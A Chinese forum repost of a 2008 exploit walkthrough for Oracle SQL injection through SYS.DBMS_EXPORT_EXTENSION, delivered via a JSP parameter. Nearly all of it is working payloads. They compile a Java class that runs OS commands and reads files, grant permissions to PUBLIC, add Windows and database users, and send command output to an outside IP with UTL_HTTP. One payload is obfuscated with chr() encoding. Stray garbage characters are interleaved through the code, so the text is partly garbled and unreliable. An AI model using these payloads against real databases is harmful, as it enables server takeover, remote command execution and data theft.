以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成 $ f+ H. _6 W- F Y0 h
- z# P; v/ j6 R8 E5 C) R. X6 P! x
/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
" r. D% t2 I: L, A2 `的形式即可。(用" 'a'|| "是为了让语句返回true值) + c+ \0 D1 | b R# `- u
语句有点长,可能要用post提交。
3 h" n- i7 |4 G$ I. v& Z以下是各个步骤: 6 M" A k, h9 v& V8 I! Z0 d
1.创建包
# e& o9 f8 H( R! a9 K8 S通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
! k/ [7 r$ U; V( l# y/xxx.jsp?id=1 and '1'<>'a'||(
: H8 j/ o+ S4 M6 w" L9 Dselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''9 \9 Z; T p/ O0 P0 M
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
. }, N6 [9 F; wnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}: G3 \4 V' ?! D; M2 ?! K, \
}'''';END;'';END;--','SYS',0,'1',0) from dual
* g4 t2 E: S3 w7 D) 3 E, Q6 p' V7 z, R V
------------------------ 8 x' D3 E4 `/ a' n
如果url有长度限制,可以把readFile()函数块去掉,即: 4 L+ \9 C/ z% @, s0 i- Y
/xxx.jsp?id=1 and '1'<>'a'||( ; `; T/ o7 @3 H& I8 O
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''9 _" @" i0 B. R1 Y& ~7 L7 d9 A
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader($ ^5 q. s. ]! X
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}: v ]% y3 t) x. A2 g# A) B1 G
}'''';END;'';END;--','SYS',0,'1',0) from dual
; \2 P8 I) F& z! d. u5 P)
' M5 h: T" o/ `同时把后面步骤 提到的 对readFile()的处理语句去掉。
9 t. B9 a' M) ?5 T `7 S------------------------------
( V T* b3 o* c9 E- r2.赋Java权限
" z4 V7 H; T2 K4 ]/ j: mselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
- \$ L$ D# p/ _" t, Y3.创建函数
" V8 p; I! O, ~select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''* ?: I A1 A3 U& I4 Y
create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual8 v8 G+ \- g# o+ A: P
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''( I: h+ t: p" Y! _; k0 _
create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
2 I2 N7 u: _1 D, c$ W5 a5 K a2 C4.赋public执行函数的权限
3 @- S+ n6 L! [+ @+ {) Vselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
6 u$ l$ j/ R# R# N& N" ~7 bselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
" z' w; q% q, {5.测试上面的几步是否成功
( r u/ s- ]; ~% |; }- R! P8 _and '1'<>'11'||( , V( l3 C/ O; b% E# ^' H6 o
select OBJECT_ID from all_objects where object_name ='LINXRUNCMD' / h& p( {6 n% _( y8 q+ G
)
* E9 w# s; T8 ]" iand '1'<>( 2 t2 z: M" w7 I1 g
select OBJECT_ID from all_objects where object_name ='LINXREADFILE'
4 {& |: n3 i6 G: b)
& I. S: [% |( a0 O y! @, h6.执行命令: * [6 @0 g0 G% t! f8 H& x( C
/xxx.jsp?id=1 and '1'<>(
3 ?5 b' k/ E. ~8 u4 dselect sys.LinxRunCMD('cmd /c net user linx /add') from dual
2 B0 R( i) ` v3 k( `" b/ V+ W
6 l( d( J: e2 w)
$ w2 J0 Z: S1 k% _8 G" E% t! s/xxx.jsp?id=1 and '1'<>(
: }2 r/ @5 l& n0 vselect sys.LinxReadFile('c:/boot.ini') from dual
; n9 J+ D2 r1 N: y7 t2 ]+ b) B7 J% d5 {+ y
)
; A ?1 _; t, F 3 O; m6 x: U# f+ V7 n
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
' N9 a; L1 r8 p* I2 u3 e5 D, U如果要查看运行结果可以用 union :
* i6 n+ I9 q- T) ?, z1 Q+ @% g/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual
$ E( q$ E1 _6 F, O, g, p或者UTL_HTTP.request(:
. U6 n; A [# K3 x. h/xxx.jsp?id=1 and '1'<>(
: V' j% `! k; F- t$ f; d4 ZSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
' ^6 |& ^! M: `$ M( R) 5 B, c+ ^! ]. v7 ]
/xxx.jsp?id=1 and '1'<>(
! ^/ p( O: f6 W. |4 h: tSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual2 S1 n T$ Z5 f$ B
) o: X- }/ Q9 ]) `& f a4 B3 T
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。* k0 F. a# T1 p
--------------------
( A( c: y# O4 Q4 n6.内部变化
+ F/ |* f5 I" n0 o8 @% \* r6 f9 f通过以下命令可以查看all_objects表达改变: : B7 y( T) q3 t
select * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'
7 G1 |0 u# Y' Y' i7.删除我们创建的函数 $ o0 }, H o# E/ e" x
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''/ \. x3 W; m+ t- j0 ]" V
drop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual
" R' M& `3 s" E0 T [7 Z==================================================== / _5 Q3 }6 d5 f9 |( Z1 K
全文结束。谨以此文赠与我的朋友。 % P9 t B/ B' Y) v
linx / c0 c/ N2 N6 C1 s" X
124829445 , {; J& J. J% I% R
2008.1.12 5 M4 P* k: R( Z d X( Z' s
linyujian@bjfu.edu.cn [4 p( R3 C3 U
======================================================================
" T2 O5 m: z* r* z9 N测试漏洞的另一方法: : W% f5 R6 L8 B* u, ]$ v; o e
创建oracle帐号: / E4 H; J, [: u K
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''' Z0 Z' W/ O* w) i, ]: o
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual+ f* ~9 x! s- c2 ~" ?
即:
8 X# I5 L6 m- S( [0 B: tselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
; p6 ]' z/ |' L5 f% Fchr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
5 R( [/ N# T8 D% [3 j! d确定漏洞存在:
$ d6 X/ I+ p3 X. {6 g1<>( 4 ?' |5 q3 e/ u& h3 s/ X- S
select user_id from all_users where username='LINXSQL'
( v5 R2 U% T5 X# S% H# H0 v) 1 F+ _# [6 R4 u7 u: K/ M9 G! V7 W
给linxsql连接权限: 6 j. m, c" ]: G; v3 Q2 c9 i
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''% v: c% Y9 r3 k$ C! b- L/ D
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual + N& H" A" l9 ]/ M
删除帐号: " u7 N- w+ x" j$ z# e; `9 e2 R
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''% }' M+ A, c. y
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
8 \. q2 n& Y# N) L% ?====================== " w/ N3 E# W) t2 m2 K" S8 d
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:8 G) N+ D7 n( H' J8 f6 h3 _9 x+ K7 H; i
1.jsp?id=1 and '1'<>( # q! O# c! W! a. t
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
) Z, j: o4 Y; ~0 W6 wcreate or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual
3 `8 ^& m6 x/ x5 i. D) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE: r& ^7 k- r1 M/ ~$ [2 H* R
)
6 C& H8 v9 e" K9 H6 t
' S" P7 g/ E+ Y. k
5 H- l8 u4 b6 g* p, G
6 c/ x9 A0 m$ V6 n; n7 o5 D3 Y |
发表于 2012-12-18 12:21:48
收藏
支持
反对